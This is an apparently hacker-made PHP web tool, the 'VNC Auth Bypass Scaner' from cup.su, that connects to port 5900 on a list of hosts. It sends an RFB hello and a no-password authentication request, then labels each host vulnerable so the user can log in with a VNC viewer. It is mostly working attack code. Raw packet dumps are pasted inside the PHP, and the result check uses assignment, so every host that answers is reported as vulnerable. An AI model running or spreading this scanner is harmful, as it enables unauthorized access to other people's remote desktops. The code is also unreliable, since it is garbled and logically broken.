<?php
/**
Made by gemaglabin ; underwater.cup.su
Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
#aol on ru.dal.net ; cup.su and antichat.ru
try to connect vulnerable hosts with Bl4ck-VNC-Viewer
milw0rm.com/exploits/1791
*/
# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");
# loging...
function tpl_process($title,$color)
{
return <<<HTML
<SCRIPT>
with(document.getElementById('logarea'))
{
str = "$title";
col = "$color"
str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
innerHTML += innerHTML ? "<BR>\\n" + str : str;
scrollTop += 14;
}
</SCRIPT>
HTML;
}
# main function
function Scan_Server ($aserver,$aport )
{
global $fsock;
$fsock = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
if ($fsock)
{
$res = false;
fread( $fsock,10 );
# sending first packet named hello
$request = pack("H*",_HELLO_PACKET);
fwrite ( $fsock,$request );
fread( $fsock,10 );
# sending second packet where we try to ayth without pass
$request = pack("H*","01");
fwrite ( $fsock,$request );
# parsing responce for our auth packet
$answer = fread( $fsock,10 );
$answer = unpack("H*",$answer);
if ($answer[1] = "00000000") $res = true;
fclose ($fsock);
}
return $res;
}
SENDING HELLO PACKET
0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A .^Г›..Ю/.ёАЁ|c..
0x0020 C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00 И.0Ѓ?..:.Ц..8˜..
0x0030 3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06 ;.я..!E..6Гљ@.Ю.
0x0040 0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9 .Њ..яюQ8q].ј...№
0x0050 1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46 .І6ЖЪUP.яу'Ч..RF
0x0060 42 20 30 30 33 2E 30 30-38 0A 0D 0A B 003.008...
0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A .QЬЁ..Ю/р·АЁ|c..
0x0020 C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00 И.0Ѓ?..-.Ц..?Ћ..
0x0030 42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06 B.я..!E..)Ь§@.Ю.
0x0040 F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50 у‹..яюQ8q].X..уP
0x0050 85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01 …Њ.CЧпP.яс`К...
VULNERABLE SERVER
0x0000 00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00 ..a[†У.P‹.3T..E.
0x0010 00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8 .TмЩ..ъ/Дѓ..И.АЁ
0x0020 7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00 |c0Ѓ?..0@...B...
0x0030 3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06 ?Ћя..!E..,!„@.k.
0x0040 21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43 !*Q8q]..яю...X.C
0x0050 D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00 ЧпуP…ЌP.ятaЕ....
0x0060 00 00 ..
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
overflow: auto;
}
input, select, div {
font: 11px tahoma, verdana, arial;
}
input.text, select {
width: 100%;
}
fieldset {
margin-bottom: 4px;
}
#header {
font-size: 9px;
color: white;
padding: 4px;
background-color: #7A96DF;
font-family: tahoma;
text-vertical: center;
}
</STYLE>
</HEAD>
<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header">
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner cup.[su]
</a>
</div>
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr>
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr>
</tr>
</table>
</div>
</div>
</form>
</BODY>
<?php
if (isset($_POST['servers']))
{
$_servers = $_POST['servers'];
$servers = explode("\r\n",$_servers);
for ($i=0;$i<count($servers);$i++)
{
$host = $servers[$i];
$port = "5900";
$vuln = Scan_Server($host,$port);
if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
else echo tpl_process("<b>$host is vulnerable</b>","green");
}
}
?>